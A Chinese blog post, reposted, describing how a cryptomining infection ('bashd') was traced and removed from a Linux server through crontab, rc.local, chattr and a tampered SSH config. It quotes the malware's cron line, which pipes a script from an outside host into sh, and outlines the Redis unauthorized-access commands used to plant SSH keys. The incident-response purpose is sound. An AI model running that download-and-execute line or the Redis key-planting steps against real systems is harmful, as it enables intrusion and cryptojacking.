服务器挖矿病毒的排查过程
今天同事反馈公司的某台服务器远程连接不上,登录服务器查看后,发现CPU使用率居高不下。kill掉后,一分钟有自动生成,整个排查思路如下:
1、top 命令查看主机负载,确认可疑进程为bashd
2、确认可疑进程尝试杀掉,pkill bashd ,但发现一会就出现,怀疑有定时任务
3、 排查定时任务,定时任务有2处可以设置,如下:
crontab –l 发现并没有定时任务
/etc/crontab 确实有定时任务,将其删除
4、检查开机自启动设置/etc/rc.loacl,果然放入了启动任务,将其删除。
5、 #find /-name bashd*
/root/bashd
/usr/sbin/bashd
查找bashd,发现有2个/usr/sbin/bash 删除后1分钟自动生成,/root/bashd 删除时提示rm 命令错误,使用想到查看其权限,
#chattr –i /root/bashd
#rm –rf /root/bashd #修改权限后可以删除了
6、可能是免密登录了,去/root/.ssh目录,果然有可疑的文件存在 bash。
7、 在ssh配置文件/etc/ssh/sshd_config中也看到把authorizeKEYfile指向了这个文件(bash).猜想是这样的,通过authorized_keys免秘钥登录后,在这个目录下创建了bash文件,修改了AuthorizedKeyfile的指向,root也设置了远端登录。
那么是写进来authorized_keys的那?
应该是redis未授权导致的,也就是说外网可以直接不用密码登录我的redis, 连上redis后,通过以下命令即可创建文件:
config set dir /root/.ssh
config set dbfilenameauthorized_keys
set key value,其中value为生成公钥,即可将公钥保存在服务器,使得登录时不需要输入账号与密码。
8、 先堵住免登录漏洞
1)、修改ssh 端口号
2)、禁止root登录
3)、修改无密码登陆文件的路径
4)、删除.ssh 下的bashd
5)、外网只映射80、22,关闭其他端口。
9、经过一顿折腾,总算把漏洞堵住了,病毒也删除了,重启后观察半小时,服务器正常。
总结:大概是这样的
1)把 */1* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh 写入crontab
2)创建免登录文件/root/.ssh/bash,修改ssh配置authorized_keys指向.ssh/bash,重启
3)curl下载/opt/KHK75NEOiq33 这个文件,并执行安装(/opt/KHK75NEOiq33--Install),然后启动bashd
杀毒过程:
1) top 检查可疑进程,pkill 杀死进程,如果进程还能存在,说明一定有定时任务或守护进程(开机启动),检查/var/spool/cron/root 和/etc/crontab 和/etc/rc.lcoal
2) 找到可疑程序的位置将其删除,如果删除不掉,查看隐藏权限。lsattr chattr 修改权限后将其删除即可。
3) 查看/root/.ssh/目录下是否设置了免秘钥登陆,并查看ssh_config配置文件是否被篡改。
4) 在防火墙关闭不必要的映射端口号,重启再测试是否还会有可疑进程存在。大致就这几个方面的考虑。
到此为止,由于时间关系就没有放截图上来。
转载于:https://blog.51cto.com/liwenjia/1959171
服务器挖矿病毒的排查过程相关推荐
- dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程
dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程 现象描述 今天通过密钥以普通用户tung的身份登录远程Cent OS服务器时,连接出现非常严重的卡顿,进入后发现CPU被名为dbus ...
- detected idea启动 web_IDEA使用Tomcat服务器出现乱码问题排查过程
IDEA使用Tomcat服务器出现乱码问题排查过程 做一个积极的人 编码.改bug.提升自己 我有一个乐园,面向编程,春暖花开! 最近刚使用IDEA,在开发一个功能的时候,开始使用Jetty作为容器进 ...
- 记一次服务器负载飙高排查过程
记一次服务器负载飙高排查过程 问题描述 在前天呢,我们公司的三台部署着php项目的线上服务器A.B.C,其中一台服务器A出现了CPU负载飙高,与其他两台服务器相差好几倍,并且在前天之前都没有出现过这么 ...
- 云服务器挖矿病毒解毒方案
CPU占用率100% 但是top命令查不出来 阿里云服务器不小心中了挖矿病毒,可能是因为连接Redis的时候关闭了防火墙,或者是口令太弱 1.先大概还原了病毒攻击思路 2.知道它的攻击方式,就可以对症 ...
- 某云服务器挖矿病毒查杀日记
接手的某项目部署于某云平台centos服务器上,由tomcat作为中间件提供应用,且购买了该平台的域名服务,从2019年底上线运营,一直运行比较平稳,可能还没正式用起来,用的人也不是很多吧.但凡事总有 ...
- 记录一次云服务器被劫持下载了挖矿病毒的处理过程
etc被篡改导致系统中病毒 起因: 一年前买的阿里云服务器 , 买了没多久 , 因为没做什么安全措施 , 然后就莫名奇妙服务器被劫持 , 在上面下载了挖矿的一些脚本 ,当时做的处理方式 简单粗暴 直接 ...
- 记一次云服务器挖矿病毒处理过程
说明 本文章转自我的51cto博客,图片上有51cto的水印,现在准备移至csdn 背景 这个服务器是自己搭建靶场用的,处置流程只供参考 某天突然收到条阿里云安全中心的短信,说发现有挖矿程序 上控制台 ...
- CentOS7 服务器挖矿病毒 删除又重新生成处理
使用 ls -l /proc/${process_id}/exe 查看进程执行 cat /var/spool/cron/root 查看日志 特征如下: CPU占用一直比较高,初步分析是挖矿程序: 系统 ...
- Linux 服务器上有挖矿病毒 kdevtmpfsi 处理办法
症状表现 服务器CPU资源使用一直处于100%的状态,通过 top 命令查看,发现可疑进程 kdevtmpfsi.通过 google搜索,发现这是挖矿病毒. 排查方法 首先:查看 kdevtmpfsi ...
最新文章
- 独家 | 数据科学家指南:梯度下降与反向传播算法
- Yii2框架源码分析之如何实现注册和登录
- python:装饰器
- rx在c语言中,RxSwift - 入门
- hdu1999 不可摸数 好题.
- 剑指Offer #05 用两个栈实现队列(模拟)
- 数学建模第六节2020.5.15-17补
- ic5141运行出现cannot compile ahdlcmi module解决方案
- 线性表----顺序表
- php中sisson用法,thinkPHP中session()方法用法详解
- Python的网络编程[5] - BOOTP + TFTP + FTP - 实现一个简单的文件传输流程
- 数据结构-第二章(1)-线性结构
- keil5安装教程简单易上手
- php数据库单循环显示,单循环赛制的PHP实现
- 英雄联盟的角色设计思路
- ADFS Change Token SigningEncryption Certificate Expiration Date
- 矩阵与逆矩阵的特征向量相同
- 使用git控制word版本
- 快手短视频如何支撑 10 亿月活,揭秘快手大数据中台架构!
- MongoDB-curd总结